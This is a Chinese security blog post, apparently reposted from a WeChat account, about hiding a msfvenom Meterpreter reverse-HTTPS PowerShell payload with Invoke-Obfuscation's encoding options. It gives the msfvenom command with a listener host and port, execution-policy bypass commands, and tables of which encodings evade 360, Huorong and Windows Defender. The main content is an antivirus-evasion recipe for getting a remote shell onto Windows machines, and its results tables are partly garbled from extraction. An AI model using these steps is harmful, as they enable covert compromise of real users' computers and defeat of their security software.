Invoke-Obfuscation混淆免杀过360和火绒

微信公众号:乌鸦安全 

Invoke-Obfuscation混淆免杀过360和火绒

扫取二维码获取更多信息!

Invoke-Obfuscation混淆免杀过360和火绒

 

更新时间:2021-05-31

Invoke-Obfuscation下载地址:https://github.com/danielbohannon/Invoke-Obfuscation

参考文档 https://blog.csdn.net/weixin_44216796/article/details/112723993

先说下结果:

Invoke-ObfuscationEncoding部分方法混淆可以过360和火绒,但是过不了Windows Defender

1. 模块使用

导入模块

Import-Module C:\0_poweshell\Invoke-Obfuscation-master\Invoke-Obfuscation.psd1

这里注意,一定要写上完整路径,不然会报错

Invoke-Obfuscation混淆免杀过360和火绒

加载模块

Invoke-Obfuscation

Invoke-Obfuscation混淆免杀过360和火绒

 

支持的加密方法:

Invoke-Obfuscation混淆免杀过360和火绒

  • TOKEN支持分部分混淆
    STRING整条命令混淆
    COMPRESS将命令转为单行并压缩,
    ENCODING编码
    LAUNCHER选择执行方式
    

     

2. msfvenom下msf上线

 

首先用msfvenom生成一个ps1文件

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.211.55.2 LPORT=4444 -f psh-reflection > msf-crow.ps1

Invoke-Obfuscation混淆免杀过360和火绒

 

然后设置监听:

Invoke-Obfuscation混淆免杀过360和火绒

然后回到win10

2.1 360

直接在有360的环境下进行执行(这里不做云查杀和杀毒的操作)

PowerShell.exe -ExecutionPolicy Bypass -File .\msf-crow.ps1

 

Invoke-Obfuscation混淆免杀过360和火绒

上线成功。

这里来一次查杀,首先使用按位置查杀

 

Invoke-Obfuscation混淆免杀过360和火绒

 

 

Invoke-Obfuscation混淆免杀过360和火绒

报毒,直接在这个位置关闭,不处理

Invoke-Obfuscation混淆免杀过360和火绒

 

再运行一次,此时360提示有毒。

Invoke-Obfuscation混淆免杀过360和火绒

2.2 Windows defender

 

复制到Windows sever2019下,Windows Defender直接杀掉

Invoke-Obfuscation混淆免杀过360和火绒

2.3 火绒

关掉Windows Defender

Invoke-Obfuscation混淆免杀过360和火绒

 

 

 

直接使用火绒扫描,没扫描到。

Invoke-Obfuscation混淆免杀过360和火绒

上线试试:

 

Invoke-Obfuscation混淆免杀过360和火绒

 

直接就上线了!!!

2.4 总结

因此在此可以进行如下总结:

msfvenom最新版(2021-05-28安装)生成powershell攻击脚本在静态下的查杀效果:

 

 

火绒

360

Windows Defender

windows 10 64位

未测

未测

windows server 2019 64位

✔️

未测

ps:以上环境都联网状态下

 

同样

msfvenom最新版(2021-05-28安装)生成powershell攻击脚本在动态执行上线的查杀效果:

 

 

火绒

360

Windows Defender

windows 10 64位

未测

未测

windows server 2019 64位

✔️

未测

ps:以上环境都联网,且均在cmd中执行-ExecutionPolicy Bypass来绕过执行安全策略进行上线。

 

这里可以看到,360在第一次并不拦截,而且还可以上线,这可能由于我用的是虚拟机,如果是实体机的话,应该会被杀。

 

3. 混淆大法

 

设置需要混淆的木马文件路径

 set scriptpath C:\0_poweshell\msf-crow.ps1

 

Invoke-Obfuscation混淆免杀过360和火绒

4. 第一种混淆 1

encoding

选择第一种方法混淆

1

Invoke-Obfuscation混淆免杀过360和火绒

将文件输出的out 1.ps1

Invoke-Obfuscation混淆免杀过360和火绒

 

Invoke-Obfuscation混淆免杀过360和火绒

文件路径:

C:\0_poweshell\Invoke-Obfuscation-master\1.ps1

攻击机开启监听模式:

Invoke-Obfuscation混淆免杀过360和火绒

上线测试:

4.1 360

 

360环境下直接运行(生成之后没有杀毒扫描)

PowerShell.exe -ExecutionPolicy Bypass -File C:\0_poweshell\Invoke-Obfuscation-master\1.ps1

 

这里是在cmd命令行下执行PowerShell命令的

-ExecutionPolicy Bypass:绕过执行安全策略,在默认情况下,PowerShell的安全策略规定了PowerShell不允许运行命令和文件。通过设置这个参数,可以绕过任意一个安全保护规则。在渗透测试中,基本每一次运行PowerShell脚本时都要使用这个参数。(参考:https://blog.csdn.net/Eastmount/article/details/115503946

 

360下上线成功

Invoke-Obfuscation混淆免杀过360和火绒

 

但使用360云查杀之后显示报毒:

Invoke-Obfuscation混淆免杀过360和火绒

4.2 windows Defender

windows Defender 直接静态被杀

Invoke-Obfuscation混淆免杀过360和火绒

4.3 火绒

火绒,静态扫描报毒

Invoke-Obfuscation混淆免杀过360和火绒

动态上线失败

Invoke-Obfuscation混淆免杀过360和火绒

4.4 总结

静态查杀

 

火绒

360

Windows Defender

windows 10 64位

未测

未测

windows server 2019 64位

未测

全挂。。。

5. 第2种混淆 2

 

Invoke-Obfuscation混淆免杀过360和火绒

Invoke-Obfuscation混淆免杀过360和火绒

 

这里先静态测试下:

5.1 火绒

 

火绒:

Invoke-Obfuscation混淆免杀过360和火绒

 

 

5.2 360

360云查杀

Invoke-Obfuscation混淆免杀过360和火绒

 

 

5.3 Windows Defender

Invoke-Obfuscation混淆免杀过360和火绒

 

静态查杀能力:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

未测

✔️

 

动态上线能力:

PowerShell.exe -ExecutionPolicy Bypass -File C:\0_poweshell\Invoke-Obfuscation-master\2.ps1

 

火绒:

静态查杀,动态上线失败

Invoke-Obfuscation混淆免杀过360和火绒

 

windf:

静态查杀正常,动态上线失败

Invoke-Obfuscation混淆免杀过360和火绒

 

360:

动态上线失败,而且清除了木马,因此这里360也是静动均查杀了木马

Invoke-Obfuscation混淆免杀过360和火绒

此时对其进行重新调整:

 

5.4 总结

静态查杀能力:

 

火绒

360

Windows Defender

windows 10 64位

未测

未测

windows server 2019 64位

未测

✔️

动态上线:

 

火绒

360

Windows Defender

windows 10 64位

未测

未测

windows server 2019 64位

未测

6. 第三种方法 3

 

Invoke-Obfuscation混淆免杀过360和火绒

6.1 360

Invoke-Obfuscation混淆免杀过360和火绒

 

动态上线测试

Invoke-Obfuscation混淆免杀过360和火绒

再次云查杀

 

Invoke-Obfuscation混淆免杀过360和火绒

6.2 火绒

Invoke-Obfuscation混淆免杀过360和火绒

 

 

6.3 windows Defender

静态正常

Invoke-Obfuscation混淆免杀过360和火绒

动态:失败

Invoke-Obfuscation混淆免杀过360和火绒

6.4 总结

静态查杀能力:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

未测

✔️

动态上线:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

未测

7. 第四种方法 4

Invoke-Obfuscation混淆免杀过360和火绒

7.1 360

Invoke-Obfuscation混淆免杀过360和火绒

 

上线测试

Invoke-Obfuscation混淆免杀过360和火绒

 

7.2 火绒

Invoke-Obfuscation混淆免杀过360和火绒

 

动态正常

 

Invoke-Obfuscation混淆免杀过360和火绒

 

 

 

7.3 windows Defender

静态过了

Invoke-Obfuscation混淆免杀过360和火绒

 

动态上线失败

Invoke-Obfuscation混淆免杀过360和火绒

7.4 总结

静态查杀能力:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

✔️

未测

✔️

动态上线:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

✔️

未测

 

8. 第五种方法 5

Invoke-Obfuscation混淆免杀过360和火绒

 

 

Invoke-Obfuscation混淆免杀过360和火绒

现在验证下各种查杀

 

8.1 360

Invoke-Obfuscation混淆免杀过360和火绒

 

动态上线

 

Invoke-Obfuscation混淆免杀过360和火绒

8.2 火绒

Invoke-Obfuscation混淆免杀过360和火绒

 

Invoke-Obfuscation混淆免杀过360和火绒

8.3 window defender

Invoke-Obfuscation混淆免杀过360和火绒

 

 

Invoke-Obfuscation混淆免杀过360和火绒

都报错,那再生成一次,这次报错更多了

Invoke-Obfuscation混淆免杀过360和火绒

 

8.4 总结

 

静态查杀能力:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

✔️

未测

✔️

动态上线:

 

火绒

360

Windows Defender

windows 10 64位

未测

运行报错

未测

windows server 2019 64位

运行报错

未测

运行报错

 

9. 第6种方法 6

 

Invoke-Obfuscation混淆免杀过360和火绒

 

9.1 360

 

Invoke-Obfuscation混淆免杀过360和火绒

 

动态上线测试,上线正常

Invoke-Obfuscation混淆免杀过360和火绒

再杀一次,还是正常

Invoke-Obfuscation混淆免杀过360和火绒

 

9.2 火绒

Invoke-Obfuscation混淆免杀过360和火绒

 

 

Invoke-Obfuscation混淆免杀过360和火绒

9.3 window defender

Invoke-Obfuscation混淆免杀过360和火绒

9.4 总结

 

 

静态查杀能力:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

✔️

未测

动态上线:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

✔️

未测

 

 

10. 第七种方法 7

Invoke-Obfuscation混淆免杀过360和火绒

 

10.1 360

Invoke-Obfuscation混淆免杀过360和火绒

 

 

动态上线测试,win10下的powershell崩掉,应该是由于字符太大的原因

Invoke-Obfuscation混淆免杀过360和火绒

 

 

10.2 火绒

Invoke-Obfuscation混淆免杀过360和火绒

 

动态上线测试:

Invoke-Obfuscation混淆免杀过360和火绒

 

10.3 window defender

Invoke-Obfuscation混淆免杀过360和火绒

由于脚本无法在我的win10下测试,这里到winserver2019上进行测试,开启Windows defender防护

Invoke-Obfuscation混淆免杀过360和火绒

上线失败

 

Invoke-Obfuscation混淆免杀过360和火绒

 

 

 

10.4 总结

 

静态查杀能力:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

✔️

未测

✔️

动态上线:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

✔️

未测

 

11. 第八种方法 8

Invoke-Obfuscation混淆免杀过360和火绒

11.1 360

 

Invoke-Obfuscation混淆免杀过360和火绒

 

Invoke-Obfuscation混淆免杀过360和火绒

11.2 火绒

Invoke-Obfuscation混淆免杀过360和火绒

 

 

 

Invoke-Obfuscation混淆免杀过360和火绒

 

 

11.3 window defender

Invoke-Obfuscation混淆免杀过360和火绒

 

Invoke-Obfuscation混淆免杀过360和火绒

 

11.4 总结

静态查杀能力:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

✔️

未测

✔️

动态上线:

 

火绒

360

Windows Defender

windows 10 64位

未测

✔️

未测

windows server 2019 64位

✔️

未测

 

 

12. 总结

12.1 版本问题

环境:

Windows10 x64 + 360

Invoke-Obfuscation混淆免杀过360和火绒

 

winserver2019 x64 + 火绒

Invoke-Obfuscation混淆免杀过360和火绒

 

windows Defender最新版本

Invoke-Obfuscation混淆免杀过360和火绒

12.2 查杀问题

火绒360Windows defender均采用联网查杀,其中360采用云杀毒模式

 

12.3 bypass av能力总结

msfvenom生成powershell攻击脚本和Invoke-Obfuscation混淆方法在Encoding模式下的静态查杀效果:

 

 

 

msfvenom最新版(2021-05-28安装)

火绒

360

Windows Defender

windows 10 64位

msfvenom最新版(2021-05-28安装)

未测

未测

windows server 2019 64位

msfvenom最新版(2021-05-28安装)

✔️

未测

 

 

方法1: ASCII

火绒

360

Windows Defender

windows 10 64位

方法1: ASCII

未测

未测

windows server 2019 64位

方法1: ASCII

未测

 

方法2: Hex

火绒

360

Windows Defender

windows 10 64位

方法2: Hex

未测

✔️

未测

windows server 2019 64位

方法2: Hex

未测

✔️

 

方法3: Octal

火绒

360

Windows Defender

windows 10 64位

方法3: Octal

未测

✔️

未测

windows server 2019 64位

方法3: Octal

未测

✔️

 

方法4: Binary

火绒

360

Windows Defender

windows 10 64位

方法4: Binary

未测

✔️

未测

windows server 2019 64位

方法4: Binary

✔️

未测

✔️

 

方法5: SecureString (AES)

火绒

360

Windows Defender

windows 10 64位

方法5: SecureString (AES)

未测

✔️

未测

windows server 2019 64位

方法5: SecureString (AES)

✔️

未测

✔️

 

方法6: BXOR

火绒

360

Windows Defender

windows 10 64位

方法6: BXOR

未测

✔️

未测

windows server 2019 64位

方法6: BXOR

✔️

未测

 

方法7: Special Characters

火绒

360

Windows Defender

windows 10 64位

方法7: Special Characters

未测

✔️

未测

windows server 2019 64位

方法7: Special Characters

✔️

未测

✔️

 

方法8: Whitespace

火绒

360

Windows Defender

windows 10 64位

方法8: Whitespace

未测

✔️

未测

windows server 2019 64位

方法8: Whitespace

✔️

未测

✔️

ps:以上环境都联网状态下,360采用云查杀

 

 

同样

msfvenom生成powershell攻击脚本和Invoke-Obfuscation混淆方法在Encoding模式下的动态上线查杀效果:

 

 

 

msfvenom最新版(2021-05-28安装)

火绒

360

Windows Defender

windows 10 64位

msfvenom最新版(2021-05-28安装)

未测

未测

windows server 2019 64位

msfvenom最新版(2021-05-28安装)

✔️

未测

 

方法1: ASCII

火绒

360

Windows Defender

windows 10 64位

方法1: ASCII

未测

未测

windows server 2019 64位

方法1: ASCII

未测

 

方法2: Hex

火绒

360

Windows Defender

windows 10 64位

方法2: Hex

未测

未测

windows server 2019 64位

方法2: Hex

未测

 

方法3: Octal

火绒

360

Windows Defender

windows 10 64位

方法3: Octal

未测

✔️

未测

windows server 2019 64位

方法3: Octal

未测

 

方法4: Binary

火绒

360

Windows Defender

windows 10 64位

方法4: Binary

未测

✔️

未测

windows server 2019 64位

方法4: Binary

✔️

未测

 

方法5: SecureString (AES)

火绒

360

Windows Defender

windows 10 64位

方法5: SecureString (AES)

未测

运行报错

未测

windows server 2019 64位

方法5: SecureString (AES)

运行报错

未测

运行报错

 

方法6: BXOR

火绒

360

Windows Defender

windows 10 64位

方法6: BXOR

未测

✔️

未测

windows server 2019 64位

方法6: BXOR

✔️

未测

 

方法7: Special Characters

火绒

360

Windows Defender

windows 10 64位

方法7: Special Characters

未测

✔️

未测

windows server 2019 64位

方法7: Special Characters

✔️

未测

 

方法8: Whitespace

火绒

360

Windows Defender

windows 10 64位

方法8: Whitespace

未测

✔️

未测

windows server 2019 64位

方法8: Whitespace

✔️

未测

ps:以上环境都联网状态下,360采用云查杀

原文地址:https://mp.weixin.qq.com/s/Nvog8OJZXvPKMqJ8MkwNAQ

上一篇:【摸鱼记录】如何删除windows defender保护历史记录


下一篇:磁盘管理命令之partx,lsblk,blkid,partprobe